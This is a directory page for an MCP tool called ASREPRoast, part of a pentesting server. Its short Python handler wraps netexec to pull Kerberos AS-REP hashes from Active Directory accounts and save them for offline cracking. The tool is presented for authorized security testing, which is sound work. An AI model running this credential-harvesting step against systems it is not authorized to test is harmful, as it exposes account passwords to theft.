Skip to main content
Glama

ASREPRoast

Retrieve Kerberos 5 AS-REP etype 23 hashes from users without pre-authentication to identify vulnerable Active Directory accounts for security testing.

Instructions

Retrieve the Kerberos 5 AS-REP etype 23 hash of users without or with Kerberos pre-authentication required

Input Schema

TableJSON Schema
NameRequiredDescriptionDefault
ipsYes
usernamesYes
passwordsYes

Implementation Reference

  • The handler function decorated with @mcp.tool registers and implements the ASREPRoast tool. It runs netexec ldap --asreproast to retrieve Kerberos AS-REP etype 23 hashes for specified users on target IPs, saving to hashes.txt. Supports optional passwords.
    @mcp.tool(name="ASREPRoast",description="Retrieve the Kerberos 5 AS-REP etype 23 hash of users without or with Kerberos pre-authentication required ") def ASREPRoast(ips:List[str],usernames,passwords): if len(passwords)>0: return run_command(["netexec","ldap"]+ips+["-u",usernames,"-p",passwords,"--asreproast",config.PROJECT_DIRECTORY+"/hashes.txt"]) return run_command(["netexec","ldap"]+ips+["-u",usernames,"--asreproast",config.PROJECT_DIRECTORY+"/hashes.txt"])

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/YoussefSahnoun/PentestMCP'

If you have feedback or need assistance with the MCP directory API, please join our Discord server